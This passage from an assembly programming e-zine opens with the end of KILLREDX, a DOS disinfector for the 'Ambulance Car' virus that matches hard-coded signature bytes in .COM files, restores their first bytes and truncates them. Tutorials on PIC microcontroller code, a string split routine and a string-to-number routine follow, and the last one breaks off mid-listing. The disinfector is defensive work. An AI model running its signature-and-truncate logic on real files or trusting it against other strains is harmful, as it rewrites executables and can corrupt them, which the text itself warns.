                 lea     si, killredx_msg
                 call    print_ASCIIZ

;--- Find first .COM file

                 lea     dx, com_mask
                 xor     cx, cx
                 mov     ah, 4Eh
                 int     21h
                 jnc     open_file
                 jmp     exit

open_file:

;--- Print found file's name

                 lea     si, newline_msg
                 call    print_ASCIIZ
                 mov     si, 9Eh
                 call    print_ASCIIZ

;--- Open found file

                 mov     dx, 9Eh
                 mov     ax, 3D02h
                 int     21h
                 jnc     read_jump

;--- Print open error message

                 lea     si, open_msg
                 call    print_ASCIIZ
                 jmp     find_next

read_jump:

;--- Read jump code

                 xchg    ax, bx
                 mov     cx, 3
                 lea     dx, jump_code
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      check_jump
                 jmp     close_file

check_jump:

;--- Compare with known virus' jump code

                 cmp     byte ptr [jump_code], 0E9h
                 je      read_displacement
                 jmp     close_file

read_displacement:

;--- Move file pointer to jump offset

                 mov     dx, word ptr [jump_code+1]
                 add     dx, 3
                 xor     cx, cx
                 mov     ax, 4200h
                 int     21h

;--- Read displacement calculation code

                 mov     cx, 7
                 lea     dx, displace_code
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      check_displacement
                 jmp     close_file

check_displacement:

;--- Compare with known virus' displacement calculation code

                 cmp     word ptr [displace_code], 01E8h
                 jne     exit_check
                 cmp     word ptr [displace_code+2], 0100h
                 jne     exit_check
                 cmp     word ptr [displace_code+4], 815Eh
                 jne     exit_check
                 cmp     byte ptr [displace_code+6], 0EEh
                 jne     exit_check
                 jmp     read_data
exit_check:
                 jmp     close_file

read_data:

;--- Move file pointer to supposed data location

                 mov     cx, 0FFFFh
                 mov     dx, 0FFF1h
                 mov     ax, 4202h
                 int     21h

;--- Read ambulance data

                 mov     cx, 2
                 lea     dx, ambulance_data
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      check_data
                 jmp     close_file

read_error:

;--- Print read error message

                 lea     si, read_msg
                 call    print_ASCIIZ
                 jmp     close_file

check_data:

;--- Compare with known virus' ambulance data

                 cmp     word ptr [ambulance_data], 0F434h
                 jne     suspicious

;--- Print file infected or suspicious message

                 lea     si, infected_msg
                 jmp     askto_clean
suspicious:
                 lea     si, suspicious_msg

askto_clean:

;--- Print prompt and read answer on whether to clean the file or not

                 call    print_ASCIIZ
                 mov     ah, 08h
                 int     21h
                 cmp     al, 'y'
                 je      clean_file
                 cmp     al, 'Y'
                 je      clean_file
                 jmp     close_file

clean_file:

;--- Move file pointer to supposed original bytes location

                 mov     cx, 0FFFFh
                 mov     dx, 0FFFDh
                 mov     ax, 4202h
                 int     21h

;--- Read host's original (first 3) bytes

                 mov     cx, 3
                 lea     dx, original_bytes
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      write_original
                 jmp     close_file

write_original:

;--- Move file pointer to beginning of file

                 xor     cx, cx
                 xor     dx, dx
                 mov     ax, 4200h
                 int     21h

;--- Write original bytes

                 mov     cx, 3
                 lea     dx, original_bytes
                 mov     ah, 40h
                 int     21h
                 jc      write_error
                 cmp     ax, cx
                 je      truncate_file

write_error:

;--- Print write error message

                 lea     si, write_msg
                 call    print_ASCIIZ
                 jmp     close_file

truncate_file:

;--- Move file pointer to virus' jump offset (real virus start)

                 mov     dx, word ptr [jump_code+1]
                 add     dx, 3
                 xor     cx, cx
                 mov     ax, 4200h
                 int     21h

;--- Truncate file

                 mov     cx, 0
                 mov     ah, 40h
                 int     21h
                 jc      write_error
                 cmp     ax, cx
                 jne     write_error

                 lea     si, disinfected_msg
                 call    print_ASCIIZ

close_file:

;--- Close file

                 mov     ah, 3Eh
                 int     21h

find_next:

;--- Find next matching file

                 mov     ah, 4Fh
                 int     21h
                 jc      exit
                 jmp     open_file

exit:

;--- Exit to DOS

                 lea     si, newline_msg
                 call    print_ASCIIZ
                 retn

killredx        endp


print_ASCIIZ    proc    near

;--- Print an ASCIIZ string

                 lodsb
                 cmp     al, 0
                 je      end_ASCIIZ
                 xchg    al, dl
                 mov     ah, 02h
                 int     21h
                 jmp     print_ASCIIZ
end_ASCIIZ:
                 retn

print_ASCIIZ    endp


killredx_msg    db      "'Ambulance Car' Disinfector", LF, CR
                 db      "KILLREDX by Chili for APJ #6", LF, CR, 0
newline_msg     db      LF, CR, 0
infected_msg    db      "  Infected. Clean [y/n]?", 0
suspicious_msg  db      "  Suspicious. Attempt to cleanû (û WARNING: file may "
                 db      "be corrupted if infected by an unknown/unsupported "
                 db      "strain of Ambulance Car) [y/n]?", 0
disinfected_msg db      LF, CR, "  Disinfected.", 0
open_msg        db      LF, CR, "  [ERROR: opening file]", 0
read_msg        db      LF, CR, "  [ERROR: reading from file]", 0
write_msg       db      LF, CR, "  [ERROR: writing to file]", 0
com_mask        db      "*.COM", 0
jump_code       db      3       dup     (?)
displace_code   db      7       dup     (?)
ambulance_data  dw      ?
original_bytes  db      3       dup     (?)

_TEXT           ends
                 end     killredx
---------------------------------------------------------------------------8<--
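
The two end-relative seeks in the disinfector pass a negative 32-bit offset in
CX:DX. As a rough illustration (Python, with helper names that are made up
here), this is how 0FFFFh:0FFF1h and 0FFFFh:0FFFDh come about. The sizes in
TRAILER are read off the data layout of the strain in the disassembly article:
the counter, the jump code, the saved first three bytes and the file handle,
followed by the host's original three bytes that are written last.

```python
# Sketch only: how the CX:DX values for LSEEK (AX = 4202h) are derived.
# Helper names are hypothetical; sizes come from the virus' data layout.

TRAILER = {
    "counter": 2,
    "jump_code": 3,
    "first_3bytes": 3,
    "file_handle": 2,
    "original_3bytes": 3,
}


def cx_dx(offset):
    """Split a signed 32-bit offset into the CX (high) and DX (low) words."""
    value = offset & 0xFFFFFFFF
    return value >> 16, value & 0xFFFF


def last_data_word_offset():
    """Offset, relative to end of file, of the last ambulance data word."""
    return -(2 + sum(TRAILER.values()))


if __name__ == "__main__":
    for offset in (last_data_word_offset(), -TRAILER["original_3bytes"]):
        cx, dx = cx_dx(offset)
        print(offset, "-> CX = %04Xh, DX = %04Xh" % (cx, dx))
```

A different strain with a longer or shorter trailer would need other offsets,
which is one reason the disinfector cannot be trusted on unknown variants.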



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                            Assembling for PIC's
                                                            Jan Verhoeven


Below is a piece of assembly language for the Microchip PIC processor. This
particular program will flash some LEDs and activate some relays based on the
status of some control inputs. The target MCU was the PIC 16C54, one of the
simplest chips in that range.

To give some indication of what we're up to:

   RAM                25 bytes
   ROM               512 words (of 12 bits each)
   I/O                12 bits
   Clockspeed          8 kHz (this project, max = 4 MHz)
   Instructions       33
   On-Chip-Stack       2 levels

Compare this to a modern PC clone....


RISC and Harvard architecture.
------------------------------
The PIC line of MCUs are RISC chips built on the Harvard architecture, and one
of the results is that they have separate code and data memories.

Higher PICs have more features, like interrupt sources on 4 or more pins,
internal interrupts etcetera. All models have a watchdog timer (WDT) which, if
enabled, needs to be cleared regularly or else the MCU will reset itself.


The PIC registers.
------------------
The register architecture of the PIC is somewhat odd to Intel programmers, but
programming resembles that of the Hewlett Packard HP 11 range of calculators.

Here is an overview of the register set. Microchip refers to this as the
"register file".

     file address          name                  comment
     ------------        --------------          --------------------
         00              indirect addressing     not a real register!
         01              RTCC                    timer counter
         02              PC (or IP)              lower 8 bits of it
         03              STATUS                  flags register
         04              FSR                     pointer for 00; bank select on 16C57
         05              Port A                  has 4 I/O lines
         06              Port B                  has 8 I/O lines
         07              Port C                  8 I/O, only 16C55 and 16C57
                                                 GP register on 'C54 and 'C56
         08              GP register             General purpose register
         ..              ..                      ..
         1F              GP register             General purpose register

Besides these "transparent registers" there are also some hidden registers
(which are also write-only...) for processor control. These are:

         TRISA           The "tristate A/B/C" registers determine the status
         TRISB           of each pin of the I/O ports.
         TRISC           A "1" makes it "input" and a "0" makes it an output.

         OPTION          is for controlling the WDT and the RTCC

And there's the ubiquitous "W" register. This is the "Working register" and is
used to haul data back and forth. PIC registers (or "files") cannot process
constants (or "literals"); this can only be done with the W register. The
concept is simple and straightforward, and eventually you will get used to it
and learn to appreciate it.

From that moment on, you will only have to get used to the fact that data is
not always ending up where you would like to have it. All instructions that
operate on W and F (any register or file) end with a "d" option. If "d" is a
"1", the destination is the file F; if "d" is "0", the result will be stored
in the W register...
This took me some time to get used to and still is my main source of errors.
Apart from having selected the wrong oscillator and not disabling the WDT....
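
To make the "d" option concrete, here is a minimal sketch in C (not PIC code)
that models how ADDWF picks its destination. The struct pic and the function
addwf are names made up for this illustration, and the STATUS flags are
ignored.

```c
#include <stdint.h>

/* Hypothetical model of a PIC 16C54: W plus a 32-entry register file. */
struct pic {
    uint8_t w;
    uint8_t file[32];
};

/* ADDWF f, d: the sum is always W + file[f]; "d" only picks where it lands.
   d = 1 stores the result in the file, d = 0 stores it in W. */
void addwf(struct pic *p, unsigned f, int d)
{
    uint8_t sum = (uint8_t)(p->w + p->file[f]);

    if (d)
        p->file[f] = sum;
    else
        p->w = sum;
}
```

Starting from W = 3 and file 0Eh = 4, a call with d = 0 leaves 7 in W and the
file untouched; the same call with d = 1 would instead put the 7 in the file
and leave W alone.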


The PIC instructions.
---------------------
The instructions for the PIC 16C54 are as follows:

     mnemonic            description
     ----------------    -----------------------------------------
     ADDWF   F, d        d := W + F
     ANDLW   k           W := W AND k
     ANDWF   F, d        d := W AND F
     BCF     F, b        bit b in F is cleared   (i.e. made zero)
     BSF     F, b        bit b in F is set       (i.e. made one)
     BTFSC   F, b        if bit b in F is CLEAR, skip next instruction
     BTFSS   F, b        if bit b in F is SET, skip next instruction
     CALL    k           push PC, PC := k
     CLRF    F           Clear file F
     CLRW                Clear W
     CLRWDT              Clear Watchdogtimer
     COMF    F, d        d := NOT F              (1's complement)
     DECF    F, d        d := F - 1
     DECFSZ  F, d        d := F - 1; If 0 => skip next instruction
     GOTO    k           PC := k
     INCF    F, d        d := F + 1
     INCFSZ  F, d        d := F + 1; If 0 => skip next instruction
     IORLW   k           W := W OR k
     IORWF   F, d        d := W OR F
     MOVF    F, d        d := F          (zero flag affected)
     MOVLW   k           W := k
     MOVWF   F           F := W
     NOP                 No operation
     OPTION              OPTION := W
     RETLW   k           W := k, pop PC
     RLF     F, d        d := rotate left through carry (F)
     RRF     F, d        d := rotate right through carry (F)
     SLEEP               enter powerdown mode
     SUBWF   F, d        d := F - W              (2's complement)
     SWAPF   F, d        d := swap-nibbles (F)
     TRIS    F           TRIS register of port F := W   (pin directions)
     XORLW   k           W := W XOR k
     XORWF   F, d        d := W XOR F

Especially the "F, d" construct takes some getting used to.

Below is the source for the "LEGO controller":

--------------------------------------------------------------------------
title   "LEGO 003"
subtitl "control LEGO technic devices"

LIST    P=16C54, R=HEX, F=INHX8M, C=120, E=0, N=80
PIC54   equ     1FFH            ; Define Reset Vectors

RTCC    equ     1h              ; define register designators
PC      equ     2h              ; the program counter is a register as well
STATUS  equ     3h              ; F3 Reg is STATUS Reg.
PORT_A  equ     5h
PORT_B  equ     6h              ; I/O Port Assignments

RTCC_tc equ     0Dh             ; time constant for RTCC
count_1 equ     0Eh             ; delay counters and GP registers
count_2 equ     0Fh

file    equ     1
w       equ     0

flag_0  equ     0               ; input bits in RA port
flag_1  equ     1
flag_2  equ     2
flag_3  equ     3

LED_0   equ     0               ; status led 1, in RB Port
LED_1   equ     1               ; status led 2
RL_1    equ     2               ; relays 1 - 3
RL_2    equ     3
RL_3    equ     4
s_clk   equ     5               ; s_clk input
s_data  equ     6               ; s_data input
go      equ     7

delay   movlw   .100            ; mov W with 100 decimal
         movwf   count_1         ; xfer W to register
dela_1  clrf    count_2         ; count_2 = 0
dela_2  decfsz  count_2, file   ; count_2 = count_2 - 1
         goto    dela_2          ; skip this instruction if count_2 = 0, ...
         decfsz  count_1, file   ; ... ending here: count_1 = count_1 - 1
         goto    dela_1          ; skip this instruction when count_1 = 0
         retlw   0               ; ending here, if so.

flash   bcf     PORT_B, LED_1   ; flash LED's 0 and 1 as an acknowledgement
         bsf     PORT_B, LED_0   ; activate the LED's.
         call    delay           ; wait a while
         bcf     PORT_B, LED_0   ; toggle the LED's
         bsf     PORT_B, LED_1
         call    delay           ; wait a second!
         bcf     PORT_B, LED_1   ; turn LED_1 off as well.
         retlw   0               ; return to caller with W = 0

RT_chk  clrwdt                  ; clear the watchdog timer
         btfsc   RTCC, 7         ; RELAY_3 follows bit7 of RTCC
         bcf     PORT_B, RL_3
         btfss   RTCC, 7
         bsf     PORT_B, RL_3
         movf    RTCC, w
         skpz                    ; internal macro for BTFSS  STATUS, 2
         retlw   0
         movf    RTCC_tc, w      ; if RTCC reached zero, reload it with the
                                 ; time constant
         movwf   RTCC
         retlw   0

start   clrf    RTCC
         clrf    RTCC_tc         ; clear RTCC and RTCC time constant
         movlw   B'00001111'
         tris    PORT_A          ; define port A as inputs
         movlw   B'11100000'
         tris    PORT_B          ; define port B as I/O
         movlw   B'00110111'
         option                  ; define state of WDT, RTCC and prescaler
         movlw   B'00011100'
         movwf   PORT_B          ; initialize port B
         call    flash           ; signal READY
         call    flash
         btfss   PORT_B, s_clk   ; if s_clkline low, check for mode 2 request
         goto    m_chk
repeat  clrwdt                  ; clear watchdog timer
         call    flash
         movf    PORT_A, w       ; read port A into W
         andlw   3               ; mask off sensor inputs
         skpnz                   ; skip next instruction if NonZero
         goto    set_tc          ; flag_0 and _1 zero => define RTCC time constant
         btfsc   PORT_A, flag_0
         goto    t_left
         btfsc   PORT_A, flag_1
         goto    t_right
         movf    PORT_B, w
         andlw   B'11100000'     ; mask for the s_clk, s_data and go bits
         skpnz                   ; if no RESET condition, skip
         goto    start
         call    RT_chk
         goto    repeat

t_left  btfsc   PORT_A, flag_2  ; if in end position, do not turn at all
         goto    l_exit
         bcf     PORT_B, RL_1    ; else set direction for Turn Left
         bsf     PORT_B, RL_2
         bsf     PORT_B, LED_0   ; show direction with LED's
         bcf     PORT_B, LED_1
chk_fl2 btfsc   PORT_A, flag_2  ; wait until home-position is reached
         goto    l_exit          ; if so, get out
         call    RT_chk          ; if not, check again
         goto    chk_fl2         ; until done
l_exit  bsf     PORT_B, RL_1    ; release relay 1
         bcf     PORT_B, LED_0   ; extinguish light 0
         goto    repeat          ; jump back

t_right btfsc   PORT_A, flag_3  ; if in end position, do not turn at all
         goto    r_exit
         bcf     PORT_B, RL_2    ; else set direction for Turn Right
         bsf     PORT_B, RL_1
         bsf     PORT_B, LED_1   ; show direction with LED's
         bcf     PORT_B, LED_0
chk_fl3 btfsc   PORT_A, flag_3  ; wait until home position reached
         goto    r_exit
         call    RT_chk
         goto    chk_fl3
r_exit  bsf     PORT_B, RL_2    ; deactivate lights and relays
         bcf     PORT_B, LED_1
         goto    repeat

m_chk   clrf    count_1         ; check inputs and make sure there's no glitch
         clrf    count_2
m_chk_1 btfss   PORT_B, s_clk
         decf    count_1, file   ; count pulses s_clkline = low
         decfsz  count_2, file
         goto    m_chk_1
         movf    count_1, w      ; w = low-pulses
         subwf   count_2, w      ; if count_1 <> count_2, glitch occurred
         skpz
         goto    start

set_tc  movf    RTCC, w         ; move current value of RTCC
         movwf   RTCC_tc         ; to time constant register
         goto    repeat

         org     PIC54           ; goto highest word in code space
         goto    start           ; and place the reset vector.

         end

--------------------------------------------------------------------------

If you ever programmed an HP 11 (or 12, 15 or 16) calculator, the conditional
jumps may ring a bell. I don't know how the HP machines handle these jumps,
but the PIC line does the following:

       condition         action by PIC
       ---------         -----------------------------------
         FALSE           execute next instruction
         TRUE            replace next instruction with a NOP

This enables the programmer to make 100% accurate timing loops, since a skip
takes the same time whether the condition is FALSE or TRUE.
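
As an illustration of how predictable this makes the timing, the "delay"
routine from the listing can be counted cycle by cycle. The sketch below is a
C model, not PIC code; delay_cycles is a name made up here. It assumes the
usual PIC 16C5x timing: one instruction cycle per instruction, and two for
anything that changes the program counter (a GOTO, a RETLW, or a skip that is
taken).

```c
/* Count the instruction cycles spent inside "delay" for a given count_1.
   The CALL that gets us there is not included. */
unsigned long delay_cycles(unsigned char n)
{
    unsigned long cycles = 2;            /* movlw + movwf */
    unsigned char count_1 = n;
    unsigned char count_2;

    do {
        count_2 = 0;
        cycles += 1;                     /* clrf count_2 */
        while (--count_2 != 0)           /* decfsz count_2, result not zero */
            cycles += 1 + 2;             /* decfsz + goto dela_2 */
        cycles += 2;                     /* decfsz that skips the goto */

        if (--count_1 != 0)
            cycles += 1 + 2;             /* decfsz + goto dela_1 */
        else
            cycles += 2;                 /* decfsz that skips the goto */
    } while (count_1 != 0);

    return cycles + 2;                   /* retlw */
}
```

Each outer pass costs 771 cycles, so the total is 771 * count_1 + 3; for the
value of 100 used in the listing that is 77103 instruction cycles. One
instruction cycle is four oscillator periods.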

The size of this piece of code is easy to calculate: each line with a
mnemonic is one instruction word. This makes 115 words from the 512 word
program memory space, so we have nearly 400 instruction words wasted.

The PICs are marvelous chips to bridge the gap between lots and lots of TTL
chips and the overkill of a microcontroller unit with separate RAM, ROM and
I/O. If you want to find out more about this kind of CPU, visit the website at

         http://www.microchip.com

for PDF datasheets and more. Scenix also has a range of clones out right now.
They are software compatible but offer more hardware features, which is not
difficult since the codeword in the design of the PICs seems to have been
KISS.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                            Splitting Strings
                                                            by mammon_

Those familiar with Perl will undoubtedly have used its split() function, which
takes a single string and splits it into multiple strings or into an array,
based on a delimiter character specified in the call. Typical invocations of
split() would be:

      ($field1, $field2, $junk) = split(':', $line, 3);
      @array = split(' ', $line);

In the first line, the source string is split into a maximum of 3 substrings,
creating a new string each time it encounters a colon character; note that the
third string, $junk, contains the entire rest of the string -- only the first 2
colons will be parsed. In the second line, an array of strings is created by
splitting the source string at whitespace; since the number of destination
strings is not specified, the array will contain one element for each
substring [read: each string created by splitting the original at a whitespace
character].

Strings and string parsing are notably tedious in assembly. After learning Perl,
I found that the pseudocode for many of my asm programs started to include a
few calls to 'split', since it is a handy one-line method of string parsing,
applicable to processing command lines, user input, and data files. As a result,
it quickly became necessary to write such a routine.

Since asm has no inherent array or string tokenizing support, there are
many possible approaches to string splitting. The most immediate problem
is that the split() routine does not know in advance how many substrings it
will be creating, so there is a temptation to code a strtok() replacement, such
that the first call returns the first substring, and subsequent calls each
return the next substring until the end of the string has been reached:

		   mov ecx, ptrArray
		   push dword ptrString
		   push dword [delimiter]
		   call split
		   mov [ecx], eax
		   add ecx, 4              ;advance past the first element
.loop:
		   call split
		   cmp eax, 0
		   je .end
		   mov [ecx], eax
		   add ecx, 4
		   jmp .loop
.end:

This allows for control over the number of substrings created by only calling
split() the desired number of times; however this method also requires a lot
of caller-side work --setting up an array, moving the string pointer returned
in eax to an appropriate array position, and keeping track of the number of
array elements. It is also noticeably more clumsy than the Perl version.

Another method would be to mimic the Perl function entirely, and have split()
return an array of substrings:

		   push dword ptrString
		   push dword [delimiter]
		   call split
		   mov [ptrStringArray], eax

This is obviously more elegant on the caller side, but it has a few subtle
problems: first, the control over how many elements are split is lost;
secondly, the array is of indefinite element size [i.e., one would have to
scan each string again in order to find the end and thus the next string];
and lastly, the duplication of the string in memory is somewhat of a waste.

The C language has more or less created a string standard in which strings are
terminated with a null ['\0' or 0x0] character. Most library or OS functions
to which the split strings will be passed tend to expect this termination; thus
each substring is going to have a termination byte added. However, this termin-
ation byte can replace the delimiter for each substring, thus allowing the
original string itself to serve as the array of substrings after the split
function. Thus, all that is required from the split function is to return an
array of dword pointers into the original string, and a count of the array
elements [substrings]:

		   push dword ptrString
		   push dword [delimiter]
		   call split
		   mov [ptrStringArray], eax
		   mov [StringArrayNum], ebx

The split function will have to create a DWORD element for each substring
it splits; while this is somewhat wasteful, it is still less expensive than
copying the entire string a second time, unless the string is composed of
1-3 byte substrings. In order to control the number of splits, a 'max_split'
parameter will have to be added to the split() routine, such that if max_split
is NULL, the split() routine will return the maximum possible number of
substrings; if max_split is non-NULL, split() will return max_split or fewer
substrings.

The complete split routine is as follows:

#--------------------------------------------------------------------split.asm
;    split( char, string, max_split)
;     Returns address of array of pointers into original string in eax
;     Returns number of array elements in ebx
;     Behavior:
;           split( ":", "this:that:theother:null\0", NULL)
;           "this\0that\0theother\0null\0"
;           ptrArray[0] = [ptrArray+0] = "this\0"
;           ptrArray[1] = [ptrArray+4] = "that\0"
;           ptrArray[2] = [ptrArray+8] = "theother\0"
;           ptrArray[3] = [ptrArray+C] = "null\0"
EXTERN malloc
EXTERN free

split:
	 push ebp
	 mov ebp, esp            ;save stack pointer
 	 mov ecx, [ebp + 8] 	 ;max# of splits
 	 mov edi, [ebp + 12] 	 ;pointer to target string
 	 mov ebx, [ebp + 16]  ;splitchar

	 xor eax, eax 		 ;zero out eax for later
	 mov edx, esp 		 ;save current stack pos.
	 push dword edi 		 ;save ptr to first substring
 	 cmp ecx, 0 			 ;is #splits NULL?
	 jnz do_split            ;--no, start splitting
	 mov ecx, 0xFFFF 	 ;--yes, set to MAX

do_split:
	 mov bh, byte [edi]      ;get byte from target string
	 cmp bl, bh 			 ;equal to delimiter?
	 je .splitstr            ;--yes, then split it
	 cmp al, bh 			 ;end of string? [al == 0x0]
	 je EOS                  ;--yes, then leave split()
	 inc edi 				 ;next char
	 jmp do_split 			 ;ordinary chars do not use up a split
.splitstr:
	 mov [edi], byte al    ;replace split delimiter with "\0"
	 inc edi 				 ;move to first char after delimiter
	 push edi 				 ;save ptr to next substring
	 loop do_split 		 ;loop #splits or till EOS

EOS:
	 mov ecx, edx 		 ;edx, ecx == original stack position
	 sub ecx, esp 		 ;get total size of pushed pointers
	 push ecx 				 ;save size
	 call malloc 			 ;allocate that much space for array
	 test eax, eax
	 jz .error
	 pop ecx 				 ;restore size
	 mov edi, eax 		 ;set destination to beginning of array
	 add edi, ecx 		 ;move to end of array
	 shr ecx, 2 			 ;divide total size/4 [= # of dwords to move]
	 mov ebx, ecx 		 ;save count

.store:
	 sub edi, 4 			 ;move to beginning of dword
	 pop dword [edi] 		 ;pop from stack to array
	 loop .store

.error:
	 mov esp, ebp
	 pop ebp
	 ret 					 ;eax = array[0], ebx = array count
#------------------------------------------------------------------------EOF

The use of the stack in this routine may be a little unclear. Each time a
delimiter is encountered, a pointer to the character after the delimiter
is pushed onto the stack:
         this:that:theother\0
         ^----------------------This is pushed at the very beginning.
                                Element#: array[0]
         this:that:theother\0
              ^-----------------This is pushed when the first ':' is found.
                                Element#: array[1]
         this\0that:theother\0
                    ^-----------This is pushed when the second ':' is found.
                                Element#: array[2]
         this\0that\0theother\0
                                The stack now looks like this:
                                --------------[ebp]
                                ptr->string1
                                ptr->string2
                                ptr->string3
                                --------------[esp]
                                The string pointers are then POPed into the
                                array, starting with array[2] and ending with
                                array[0].

Once the string is parsed and the pointers are PUSHed to the stack, edi is set
to the address of the array [mov edi, eax] and advanced to the end of the
allocated array [add edi, ecx]. The counter is then set to the number of DWORD
pointers that have been pushed onto the stack [shr ecx, 2]; for each DWORD
pointer, edi is withdrawn 4 bytes more from the end of the array [sub edi, 4]
and the pointer is POPed into that 4 byte space. In the last iteration of the
loop, edi is set to the beginning of the allocated array, and the first DWORD
pointer [ array[0] ] is POPed into the first array element.
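
For readers who find C easier to follow than the stack juggling above, the
same in-place idea can be sketched as below. This is only a model under stated
assumptions: split_in_place and its parameters are names invented here,
max_split is read as a limit on the number of splits (0 meaning no limit), and
two passes over the string stand in for the asm routine's trick of collecting
the pointers on the stack.

```c
#include <stdlib.h>

/* Split s in place at delim. Returns a malloc()ed array of pointers into s
   (NULL if the allocation fails) and stores the element count in *count. */
char **split_in_place(char *s, char delim, size_t max_split, size_t *count)
{
    size_t n = 1;                        /* the string start is element 0 */
    size_t i = 0;
    char **array;
    char *p;

    /* First pass: count the substrings so the array can be sized exactly. */
    for (p = s; *p != '\0'; p++)
        if (*p == delim && (max_split == 0 || n <= max_split))
            n++;

    array = malloc(n * sizeof *array);
    if (array == NULL)
        return NULL;

    /* Second pass: overwrite each delimiter with '\0' and record where the
       next substring starts, stopping once n pointers are stored. */
    array[i++] = s;
    for (p = s; *p != '\0' && i < n; p++) {
        if (*p == delim) {
            *p = '\0';
            array[i++] = p + 1;
        }
    }

    *count = n;
    return array;
}
```

As with the asm version, the caller owns the returned array and should free()
it; the substrings themselves live in the original buffer.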

To test this, of course, one needs a program to drive it. The following code
simulates an /etc/passwd read, splitting a hard-coded line into its component,
colon-delimited fields:

#----------------------------------------------------------------splittest.asm
BITS 32
GLOBAL main
EXTERN printf
EXTERN free
EXTERN exit
%include 'split.asm'

SECTION .text
main:
	 push dword szString  ;print the original string
	 push dword szOutput
	 call printf
	 add esp, 8

	 push dword ":" 		 ;split the original string
	 push dword szString
	 push dword 0
	 call split
	 add esp, 12

	 mov [ptrarray], eax  ;keep the array address for free()
	 mov ecx, ebx
	 mov ebx, eax
printarray: 				 ;print the substrings
	 push ecx 				 ;printf hoses ecx!!!!!
	 push dword [ds:ebx]
	 push dword szOutput
	 call printf
	 add esp, 8
	 add ebx, 4 			 ;skip to next array element
	 pop ecx
	 loop printarray

	 push dword [ptrarray] ;free the array created by split
	 call free
	 add esp, 4

	 push dword 0 		 ;program is done
	 call exit

SECTION .data
szOutput db '%s',0Ah,0Dh,0 							 ;printf format string
szString db 'name:password:UID:GID:group:home',0 ;string to print
ptrarray dd 0 											 ;array address returned by split
#------------------------------------------------------------------------EOF

This program was written using nasm on a glibc Linux platform; however the
split routine itself is fairly portable --the only assumed external routine
is malloc() -- and can easily be rewritten for the DOS or Win32 platforms.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    String to Numeric Conversion
                                                    by Laura Fairhead


     Here I present you with a library routine that scans a value from
a string and converts it to an integer. It is very useful, not only
when you have to convert string->value but also if you are parsing and
want to recognise a numeric token.

     The routine will scan values in any radix up to 36. Characters
for the digit values from 10-35 are naturally "A"-"Z"/"a"-"z".

     With this routine there are 2 entry points, 'scanur' and 'scanu'.
'scanur' is used to set the radix of the scan conversion. Once this value
is set the main routine 'scanu' can be called freely to scan values from
the string.

     The scan routine is called with a string pointer which is updated
on exit to the first invalid character. It will return with the carry
flag set if the value was too big to fit into the return register EAX.
If the carry flag is clear there is no error, and the zero flag then
indicates whether a valid value was actually scanned (ZF=1 means no
digits were read). This return status convention gives the most
flexibility to the application programmer; if a valid value MUST be
scanned, they can detect both conditions via:-

     CALL NEAR PTR scanu
     JNA error               ;get out if overflow/no value

     The branch will be taken if CF=1 or ZF=1. Hence, if a value has to be
scanned errors may be picked up with only one test.
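
     For comparison, the same return convention can be modelled in C. This
is only a sketch: scan_unsigned, digit_value and the scan_status names are
invented for the illustration, the radix is passed as a parameter instead of
being set by a separate call, and a three-way status code stands in for the
CF/ZF pair (SCAN_OVERFLOW for CF=1, SCAN_NONE for CF=0/ZF=1, SCAN_OK for
CF=0/ZF=0).

```c
#include <stdint.h>

enum scan_status { SCAN_OK, SCAN_NONE, SCAN_OVERFLOW };

/* Map a character to its digit value, or -1 if it is not a digit/letter. */
static int digit_value(unsigned char c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    c &= 0xDF;                           /* fold lower case to upper case */
    if (c >= 'A' && c <= 'Z')
        return c - 'A' + 10;
    return -1;
}

/* Scan an unsigned value from *ps. On return *ps points at the first
   character that was not consumed; *out is only written when there was
   no overflow. */
enum scan_status scan_unsigned(const char **ps, unsigned radix, uint32_t *out)
{
    const char *s = *ps;
    uint32_t total = 0;
    enum scan_status st;

    for (;;) {
        int d = digit_value((unsigned char)*s);
        uint64_t next;

        if (d < 0 || (unsigned)d >= radix)
            break;                       /* invalid for this radix: stop */
        next = (uint64_t)total * radix + (uint32_t)d;
        if (next > UINT32_MAX) {         /* would not fit in 32 bits */
            *ps = s;
            return SCAN_OVERFLOW;
        }
        total = (uint32_t)next;
        s++;
    }

    st = (s == *ps) ? SCAN_NONE : SCAN_OK;
    *out = total;
    *ps = s;
    return st;
}
```

     A caller that MUST get a value simply treats anything other than
SCAN_OK as an error, which is the C counterpart of the single JNA test.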


=========START OF CODE=====================================================
;
;(current scan radix)
;
scanuradi:
         DB ?

;
;scanur-    set up for scanu routine
;
;entry:     AL=radix
;
;        !! radix must be in range 0<=radix<=36
;
;        !! radix must be set by calling this routine prior to
;        !! using scanu
;
;exit:      (all registers preserved)
;

scanur  PROC NEAR

         MOV BYTE PTR CS:[scanuradi],AL
         RET

scanur  ENDP

;
;scanu-     scan string value returning result
;
;entry:     DS:SI=address of string
;           DF=0
;
;        !! radix must be set previously by calling 'scanur'
;
;exit:      SI=updated to offset of first invalid character
;
;           CF=1
;            a numeric overflow has occurred, ie: the number being scanned
;           has become too big to fit into EAX
;
;           CF=0
;            if ZF=0 then a valid value was scanned, if ZF=1 then no
;           valid digits were scanned
;
;           EAX=converted value
;

scanu   PROC NEAR
;
;preserve registers
;
         PUSH EDX
         PUSH EBX
         PUSH ECX
         PUSH DI
;
;initialise
;  EBX=radix constant
;  EAX=total
;  ECX=0, bits 8-31 of ECX always=0 to pad byte digit to dword
;   DI=holds original offset
;
         XOR EAX,EAX
         XOR EBX,EBX
         XOR ECX,ECX
         MOV DI,SI
         MOV BL,BYTE PTR CS:[scanuradi]
;
;main loop start
; EAX,ECX change roles so that we can use AL for the digit calculation
; saving code length
;
lop:    XCHG EAX,ECX
         LODSB
;
;if "0"-"9" map to 0-9 and skip to radix check
;
         SUB AL,030h
         CMP AL,0Ah
         JC SHORT ko
         ADD AL,030h
;
